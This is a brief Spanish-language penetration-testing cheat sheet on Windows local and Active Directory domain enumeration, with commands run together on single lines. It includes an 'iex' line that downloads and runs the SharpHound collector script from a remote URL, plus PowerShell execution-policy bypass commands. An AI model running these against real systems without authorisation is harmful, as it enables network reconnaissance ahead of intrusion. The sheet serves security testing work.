Enumeracion
1. Enumeración de la máquina local
$ Get-ComputerInfo$ iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1'))$ HOSTNAME.EXE$ Get-WmiObject -Class win32_OperatingSystem | select version,buildnumber$ wmic qfe list full | findstr /i hotfix2. Enumeración del dominio
powershell.exe -executionpolicy bypass
powershell.exe -ep bypass
Set-ExecutionPolicy UnrestrictedLAPS
Bloodhound
Last updated